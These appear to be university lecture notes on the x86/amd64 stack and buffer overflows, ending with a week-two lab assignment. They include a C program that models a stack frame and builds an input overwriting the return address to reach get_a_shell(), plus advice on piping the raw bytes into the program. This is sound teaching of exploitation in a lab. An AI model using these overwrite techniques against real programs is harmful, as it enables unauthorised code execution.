CS 519/419 Cyber Attacks & Defense Yeongjin Jang 10/02/18
Week 1
• Due: 10/02 2:00 pm
• Late submission due: 10/09 2:00 pm (50% of the points)
• No points after this date
x86 Stack
• Stores local variables (negative offsets from %ebp)
    mov -0x8(%ebp), %eax
    lea -0x24(%ebp), %eax
• Stores function arguments from the caller (positive offsets from %ebp)
    mov 0x8(%ebp), %eax
    mov 0xc(%ebp), %eax
• Pushes function arguments for the callee (non-negative offsets from %esp)
    mov  %eax, (%esp)
    movl $0x4, 0x4(%esp)
Calling Convention
• x86 (32-bit): pushes arguments on the stack (for the callee)
    0x4*n(%esp) holds the n-th argument (counting from 0)
    (%esp)    – accessed by the callee as 0x8(%ebp)
    0x4(%esp) – accessed by the callee as 0xc(%ebp)
    0x8(%esp) – accessed by the callee as 0x10(%ebp)
  Why +8 on the %ebp side? call pushes the return address, and the callee's prologue (push %ebp; mov %esp, %ebp) pushes the caller's %ebp on top of it. %ebp therefore points at the saved EBP, 0x4(%ebp) is the return address, and the first argument is at 0x8(%ebp).
• amd64 (64-bit): uses registers to pass arguments to the callee
    Register order (1st, 2nd, 3rd, 4th, 5th, 6th): %rdi, %rsi, %rdx, %rcx, %r8, %r9
    Further arguments go on the stack
    The callee reads its arguments from the same registers
amd64 Example
• printf() in x86 (three arguments, all placed on the stack):
    lea  0x8048727, %eax          # 1st: format string
    mov  -0x8(%ebp), %ecx         # 2nd
    mov  -0xc(%ebp), %edx         # 3rd
    mov  %eax, (%esp)             # 1st -> (%esp)
    mov  %ecx, 0x4(%esp)          # 2nd -> 0x4(%esp)
    mov  %edx, 0x8(%esp)          # 3rd -> 0x8(%esp)
    call 0x8048370 <printf@plt>   # printf(0x8048727, ebp_8, ebp_c)
• printf() in amd64 (three arguments, all in registers):
    movabs $0x400905, %rdi        # 1st: format string
    mov    -0x8(%rbp), %rsi       # 2nd
    mov    -0x10(%rbp), %rdx      # 3rd
    callq  0x400500 <printf@plt>  # printf(0x400905, rbp_8, rbp_10)
• Not shown in the listing: for a variadic callee such as printf, the amd64 ABI also expects %al to hold the number of vector registers used for arguments (0 here, normally set with mov $0x0, %eax just before the call).
amd64 Stack
• Stores local variables (negative offsets from %rbp)
    mov -0x8(%rbp), %rax
    lea -0x24(%rbp), %rax
• Function arguments from the caller do not use the stack (for the first six integer/pointer arguments)
    mov %rdi, %rax
    mov %rsi, %rax
• Function arguments to the callee do not use the stack
    mov %rax, %rdi
    mov $0x4, %rsi
    mov $0x40006, %rdx
• The return address is still pushed on the stack by call, directly above the saved %rbp, so the frame layout around it is the same as on x86 (with 8-byte slots)
Stack
• Defines the variable scope of a function
• Local variables (negative offsets from %ebp)
• Arguments (positive offsets from %ebp)
• Function call arguments (non-negative offsets from %esp)
• Frame layout (high addresses at the top):
    MY_ARG 2      ebp+0xc
    MY_ARG 1      ebp+0x8
    Return Addr   ebp+0x4
    Saved EBP     <- %ebp
    Local A       ebp-0x8
    Local B       ebp-0xc
    Local C       ebp-0x10
    ARG 2         esp+0x4
    ARG 1         <- %esp
• Return addr / Saved EBP? Required to restore the caller's frame and resume the caller on return
Example – Function call
• In bof-level0, main() calls receive_input():
    call 0x8048570 <receive_input>
  No arguments are passed, so nothing is stored at (%esp) before the call.
• Head of receive_input:
    0x08048570 <+0>: push %ebp
    0x08048571 <+1>: mov  %esp, %ebp
    0x08048573 <+3>: push %esi
    0x08048574 <+4>: sub  $0x54, %esp
• Step by step (%ebp initially points somewhere up, into main's frame):
  1. call: push the address of the instruction after the call (the return address) on the stack, then jump to receive_input
  2. push %ebp: save main's %ebp just below the return address
  3. mov %esp, %ebp: %ebp now points at the saved EBP, so the return address is at 0x4(%ebp)
  4. push %esi: save the callee-saved %esi at -0x4(%ebp)
  5. sub $0x54, %esp: reserve 84 bytes for locals and outgoing arguments; the frame now runs from the return address down to %esp
• Resulting frame (high addresses at the top):
    Return Addr   ebp+0x4
    Saved EBP     <- %ebp
    Saved ESI     ebp-0x4
    ...           locals and argument area (0x54 bytes)
                  <- %esp
Example – Function call
• Call printf? Inside receive_input:
    movl $0x4141, -0x8(%ebp)       # local at ebp-0x8
    movl $0x4242, -0xc(%ebp)       # local at ebp-0xc
    mov  -0x8(%ebp), %ecx
    mov  -0xc(%ebp), %edx
    mov  %eax, (%esp)              # 1st argument: the format string (address in %eax)
    mov  %ecx, 0x4(%esp)           # 2nd argument: 0x4141
    mov  %edx, 0x8(%esp)           # 3rd argument: 0x4242
    call 0x8048370 <printf@plt>
• Frame after the stores (high addresses at the top):
    Return Addr
    Saved EBP       <- %ebp
    Saved ESI       ebp-0x4
    0x4141          ebp-0x8
    0x4242          ebp-0xc
    ...
    ARG 3: 0x4242   esp+0x8
    ARG 2: 0x4141   esp+0x4
    ARG 1: string   <- %esp
• The locals are copied into the outgoing-argument area at the bottom of the same frame; call then pushes printf's return address just below ARG 1, and printf reads ARG 1 as 0x8(%ebp) in its own frame.
Example – Function Return
• Function return of receive_input:
    add $0x54, %esp
    pop %esi
    pop %ebp
    ret
• Step by step:
  1. add $0x54, %esp: discard the locals and the argument area; %esp now points at Saved ESI
  2. pop %esi: restore %esi; %esp points at Saved EBP
  3. pop %ebp: restore main's %ebp; %esp points at the return address
  4. ret: pop %eip, i.e. load the return address into the instruction pointer and continue in main
• After ret, %ebp and %esp are back to where they were before the call (%esp is just above the slot that held the return address). The old frame contents (0x4141, 0x4242, the argument area) are still in memory but no longer belong to any frame.
Buffer Overflow
• Writing values over the variables
• In the frame below:
    -0x8(%ebp) stores 0x4141
    -0xc(%ebp) stores 0x4242
    -0x10(%ebp) is a buffer of size 4 bytes
• The program gets input from you via
    fgets(buffer, 128, stdin);
  which reads up to 127 bytes (plus a terminating NUL) into the 4-byte buffer: the size passed to fgets is not the size of the buffer.
• Frame before the read (high addresses at the top):
    Return Addr
    Saved EBP       <- %ebp
    Saved ESI       ebp-0x4
    0x4141          ebp-0x8
    0x4242          ebp-0xc
    Buffer          ebp-0x10
    ...
    ARG 1           <- %esp
• What if you type "1111aaaabbbb"?
    ebp-0x10: "1111" -> 0x31313131 (fills the buffer)
    ebp-0xc:  "aaaa" -> 0x61616161 (was 0x4242)
    ebp-0x8:  "bbbb" -> 0x62626262 (was 0x4141)
  fgets also appends a NUL after the last character, so the lowest byte of Saved ESI at ebp-0x4 becomes 0x00 as well.
• You can change variables! The stack grows down, but writes into the buffer go up, towards the saved registers and the return address.
Return Address
• Stores the point where execution resumes after the call. In main:
    0x08048666 <+6>:  call 0x8048570 <receive_input>
    0x0804866b <+11>: xor  %eax, %eax
• call pushes the address of the next instruction, so the return-address slot (0x4(%ebp) inside receive_input) should hold 0x804866b while receive_input runs.
Buffer Overflow
• 4-byte buffer... what if you type "1111aaaabbbbccccddddeeee"?
    ebp-0x10: "1111" -> 0x31313131 (buffer)
    ebp-0xc:  "aaaa" -> 0x61616161
    ebp-0x8:  "bbbb" -> 0x62626262
    ebp-0x4:  "cccc" -> 0x63636363 (Saved ESI)
    ebp:      "dddd" -> 0x64646464 (Saved EBP)
    ebp+0x4:  "eeee" -> 0x65656565 (Return Addr)
• Overwrites the return address!
• Can you set that as the address of get_a_shell()?
• Function return of receive_input with the overwritten frame:
    add $0x54, %esp     # %esp -> overwritten Saved ESI
    pop %esi            # %esi = 0x63636363
    pop %ebp            # %ebp = 0x64646464, INVALID
    ret                 # %eip = whatever is in the return-address slot
• If the four bytes at ebp+0x4 are the address of get_a_shell() (written in little-endian byte order, least significant byte first), ret runs get_a_shell()!
• %ebp is garbage at that point. If get_a_shell() has the usual prologue (push %ebp; mov %esp, %ebp) it replaces %ebp before using it, so the body runs; the bogus value only matters if get_a_shell() tries to return normally afterwards.
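The two overflow walkthroughs above (changing the locals with "1111aaaabbbb", and landing on the return address with "1111aaaabbbbccccddddeeee") can be checked without a crashing process by modelling the receive_input() frame as a byte array. The following is an added example, not code from the lecture or from the bof-level challenges: it uses the slot offsets, the initial locals 0x4141/0x4242 and the return address 0x804866b from the slides, and builds the Level 2 style input that points the return address at a chosen target. The saved %esi and saved %ebp contents, the target address 0x080485f6 used in main(), and the function names (slot_after_input, build_payload, ret_after_payload) are placeholders chosen for the example.

```c
/*
 * Added example: byte-level model of the receive_input() frame from the
 * slides (32-bit x86). Low addresses first, the buffer at index 0:
 *   idx 0x00  ebp-0x10  4-byte buffer (fgets target)
 *   idx 0x04  ebp-0x0c  local B = 0x4242
 *   idx 0x08  ebp-0x08  local A = 0x4141
 *   idx 0x0c  ebp-0x04  saved %esi      (assumed contents)
 *   idx 0x10  ebp+0x00  saved %ebp      (assumed contents)
 *   idx 0x14  ebp+0x04  return address  (0x804866b from the slides)
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FRAME_BYTES   0x18
#define BUF_OFF       0x00
#define LOCAL_B_OFF   0x04
#define LOCAL_A_OFF   0x08
#define SAVED_ESI_OFF 0x0c
#define SAVED_EBP_OFF 0x10
#define RET_OFF       0x14

struct frame { uint8_t mem[FRAME_BYTES]; };

/* x86 is little-endian: the lowest address holds the least significant byte. */
static uint32_t rd32(const struct frame *f, size_t off) {
    const uint8_t *p = f->mem + off;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void wr32(struct frame *f, size_t off, uint32_t v) {
    uint8_t *p = f->mem + off;
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* The frame just before fgets() runs, as drawn on the slides. */
static struct frame fresh_frame(void) {
    struct frame f;
    memset(f.mem, 0, sizeof f.mem);
    wr32(&f, LOCAL_B_OFF, 0x4242);
    wr32(&f, LOCAL_A_OFF, 0x4141);
    wr32(&f, SAVED_ESI_OFF, 0xdeadbeef);   /* assumed: %esi on entry */
    wr32(&f, SAVED_EBP_OFF, 0xffffd000);   /* assumed: main()'s %ebp */
    wr32(&f, RET_OFF, 0x0804866b);         /* from the slides: main+11 */
    return f;
}

/*
 * fgets(buffer, 128, stdin) on the 4-byte buffer: copies up to 127 bytes
 * (stopping after a newline) and appends a NUL, ignoring the real buffer
 * size, so everything past byte 4 overwrites the slots above. Bytes beyond
 * the modelled frame are dropped here; a real process keeps writing upward.
 */
static void overflow(struct frame *f, const uint8_t *input, size_t len) {
    size_t n = 0;
    while (n < len && n < 127) {
        if (BUF_OFF + n < FRAME_BYTES) f->mem[BUF_OFF + n] = input[n];
        if (input[n++] == '\n') break;
    }
    if (BUF_OFF + n < FRAME_BYTES) f->mem[BUF_OFF + n] = 0;   /* terminating NUL */
}

/* Value of one slot after typing `input` (a C string, as on the slides). */
static uint32_t slot_after_input(const char *input, size_t slot_off) {
    struct frame f = fresh_frame();
    overflow(&f, (const uint8_t *)input, strlen(input));
    return rd32(&f, slot_off);
}

/*
 * Level 2 payload: 20 filler bytes cover the buffer, both locals, saved
 * %esi and saved %ebp; the next 4 bytes, `target` least significant byte
 * first, land on the return-address slot. A 0x0a byte in the address would
 * end the fgets() read early, so such a target is rejected (returns 0).
 */
static size_t build_payload(uint32_t target, uint8_t *out, size_t cap) {
    const size_t ret_dist = RET_OFF - BUF_OFF;             /* 0x14 = 20 */
    if (cap < ret_dist + 4) return 0;
    for (int i = 0; i < 4; i++)
        if (((target >> (8 * i)) & 0xff) == '\n') return 0;
    memset(out, 'A', ret_dist);
    for (int i = 0; i < 4; i++)
        out[ret_dist + i] = (uint8_t)(target >> (8 * i));
    return ret_dist + 4;
}

/* Return address that `ret` would pop after delivering build_payload(target). */
static uint32_t ret_after_payload(uint32_t target) {
    uint8_t payload[32];
    size_t n = build_payload(target, payload, sizeof payload);
    struct frame f = fresh_frame();
    overflow(&f, payload, n);
    return rd32(&f, RET_OFF);
}

int main(void) {
    const char *inputs[] = { "1111aaaabbbb", "1111aaaabbbbccccddddeeee" };
    for (int k = 0; k < 2; k++) {
        printf("input \"%s\":\n", inputs[k]);
        printf("  local A  (ebp-0x8) = 0x%08x\n", (unsigned)slot_after_input(inputs[k], LOCAL_A_OFF));
        printf("  local B  (ebp-0xc) = 0x%08x\n", (unsigned)slot_after_input(inputs[k], LOCAL_B_OFF));
        printf("  saved EBP (ebp)    = 0x%08x\n", (unsigned)slot_after_input(inputs[k], SAVED_EBP_OFF));
        printf("  ret addr (ebp+0x4) = 0x%08x\n", (unsigned)slot_after_input(inputs[k], RET_OFF));
    }
    printf("payload for 0x080485f6 -> ret addr = 0x%08x\n", (unsigned)ret_after_payload(0x080485f6));
    return 0;
}
```

Build with `cc -std=c99 frame_model.c && ./a.out`. Two details the model makes visible that the diagrams do not: the NUL that fgets appends clobbers one byte past the typed input (the low byte of Saved ESI for the 12-byte input), and an address containing 0x0a cannot be delivered through fgets at all. For the real challenge the address bytes are not typeable, so the payload has to be emitted as raw bytes (for example with printf or a short script) and piped into the program.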
Assignment: Week-2
• Please solve the challenges in the /home/labs/week2 directory
• Level 0 – change the value of local variables via BOF
• Level 1 – the same as Level 0, on amd64
• Level 2 – change the return address to execute get_a_shell()
• Level 3 – change the return address to execute get_a_shell(), 64-bit
• Level 4 – defeat a simple defense against return address overwriting
• Five more will be released on Thursday
• Due: 10/11 2:00 pm